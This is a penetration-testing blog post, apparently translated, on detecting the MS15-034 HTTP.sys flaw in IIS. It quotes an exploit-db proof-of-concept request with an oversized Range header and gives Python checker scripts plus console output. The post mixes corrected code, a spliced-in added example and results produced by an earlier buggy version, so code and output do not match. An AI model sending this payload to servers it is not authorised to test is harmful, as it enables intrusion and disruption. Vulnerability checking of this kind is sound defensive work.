Penetration Testing: Code Demo for Detecting a Vulnerability

Author: 幼姿沫 | Published 2020-09-18 19:51

    1. Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034), reference:

    https://www.exploit-db.com/exploits/36773

    Bug information shown in the PoC source:


    /*
    UNTESTED - MS15-034 Checker

    THE BUG:
    8a8b2112 56              push    esi
    8a8b2113 6a00            push    0
    8a8b2115 2bc7            sub     eax,edi
    8a8b2117 6a01            push    1
    8a8b2119 1bca            sbb     ecx,edx
    8a8b211b 51              push    ecx
    8a8b211c 50              push    eax
    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

    ORIGINAL POC: http://pastebin.com/raw.php?i=ypURDPc4
    BY: john.b.hale@gmai.com
    Twitter: @rhcp011235
    */

    // our evil buffer
    char request1[]="GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

    2. MS15-034 testing method, reference page:

    https://blog.csdn.net/Jiajiajiang_/article/details/80742955

    3. Test code for detecting the bug:

    # MS15-034 vulnerability checker
    import requests

    url = 'http://192.168.1.3/'
    r = requests.get(url)
    remote_request = r.headers.get('Server', '')

    # Substring membership, not str.find(): find() returns -1 on a miss, and -1 is truthy,
    # so the original test passed for every server.
    if 'IIS/10.0' in remote_request or 'IIS/8.5' in remote_request:
        # The probe belongs in the HTTP headers (headers=), not the query string (params=),
        # and the Range value carries no spaces.
        protype = {'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
        r1 = requests.get(url, headers=protype)
        print(r1.request.headers)
        print(r1.content)
        # Same find() pitfall here: use membership on the decoded body.
        if 'Requested Range Not Satisfiable' in r1.text:
            print(url + ' vulnerability exists')
        else:
            print(url + ' vulnerability does not exist')
    else:
        print('Server is not IIS/10.0 or IIS/8.5')
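As an added example (not code from the original post), the same check restructured so that the version test and the response classification are pure functions that can be exercised without a network, with the two-request probe kept in a separate function for hosts you administer. RANGE_PROBE is the checker range from the exploit-db header quoted above; the sample responses are constructed; the rule that a 400 answer means a patched HTTP.sys is an assumption taken from public write-ups of MS15-034, not something this post states.

```python
# Added example: MS15-034 range-header checker with the verdict logic separated
# from the network I/O so that it can be tested offline.
try:
    import requests          # only needed by probe(); the pure functions work without it
except ImportError:
    requests = None

# The checker range from the exploit-db 36773 header quoted in the post.
RANGE_PROBE = "bytes=0-18446744073709551615"

# IIS versions the post singles out; extend for the other HTTP.sys builds you track.
TARGET_VERSIONS = ("IIS/8.5", "IIS/10.0")

# Constructed sample responses (not captured from a real host) for offline checks.
SAMPLE_VULNERABLE = (416, "<h1>Requested Range Not Satisfiable</h1>")
SAMPLE_START_PAGE = (200, "<title>IIS Windows</title>")
SAMPLE_PATCHED = (400, "<h1>Bad Request</h1>")


def server_is_candidate(server_header: str) -> bool:
    """True when the Server header names a version worth probing.

    Uses substring membership. The post's original check used str.find(),
    which returns -1 on a miss; -1 is truthy, so every server passed the test.
    """
    return any(version in server_header for version in TARGET_VERSIONS)


def classify(status_code: int, body: str) -> str:
    """Map the probe response to a verdict string.

    416 plus the 'Requested Range Not Satisfiable' text is the MS15-034
    indicator the post relies on. The 400 rule is an assumption from public
    write-ups (a patched HTTP.sys rejects the range outright). Anything else
    means the Range header was simply ignored, which is also what a server
    that is not HTTP.sys does.
    """
    if status_code == 416 and "Requested Range Not Satisfiable" in body:
        return "vulnerable"
    if status_code == 400:
        return "patched"
    return "not vulnerable"


def probe(url: str, timeout: float = 5.0) -> str:
    """Run the two-request check against a host you are authorised to test."""
    if requests is None:
        raise RuntimeError("the requests package is required for probe()")
    first = requests.get(url, timeout=timeout)
    server = first.headers.get("Server", "")
    if not server_is_candidate(server):
        return "skipped: Server header is %r" % server
    # headers=, not params=: the probe belongs in the HTTP headers, and the
    # Range value carries no spaces.
    second = requests.get(
        url, headers={"Host": "stuff", "Range": RANGE_PROBE}, timeout=timeout
    )
    return classify(second.status_code, second.text)


if __name__ == "__main__":
    for status, body in (SAMPLE_VULNERABLE, SAMPLE_START_PAGE, SAMPLE_PATCHED):
        print(status, "->", classify(status, body))
    print(server_is_candidate("Microsoft-IIS/10.0"), server_is_candidate("nginx/1.18.0"))
```

Keeping classify() free of network calls lets you replay captured responses from a scan log through the same verdict logic, and makes the false-positive mode of the original script (a truthy -1 from find()) impossible to reintroduce unnoticed.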

    4. Results

    1. How the URL address is obtained

    2. Console output (note that the printed request headers contain no Host or Range entry, because the script passed them as params= rather than headers=, and the body is the normal IIS start page rather than a 416 error; the "already exits" verdict below comes from str.find() returning -1, which is truthy):

    {'User-Agent': 'python-requests/2.23.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

    b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />\r\n<title>IIS Windows</title>\r\n<style type="text/css">\r\n<!--\r\nbody {\r\n\tcolor:#000000;\r\n\tbackground-color:#0072C6;\r\n\tmargin:0;\r\n}\r\n\r\n#container {\r\n\tmargin-left:auto;\r\n\tmargin-right:auto;\r\n\ttext-align:center;\r\n\t}\r\n\r\na img {\r\n\tborder:none;\r\n}\r\n\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="container">\r\n<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>\r\n</div>\r\n</body>\r\n</html>'

    http://192.168.1.3/ already exits

    Microsoft-IIS/10.0

    Information shown for the site path


    Article link: https://www.haomeiwen.com/subject/chzjyktx.html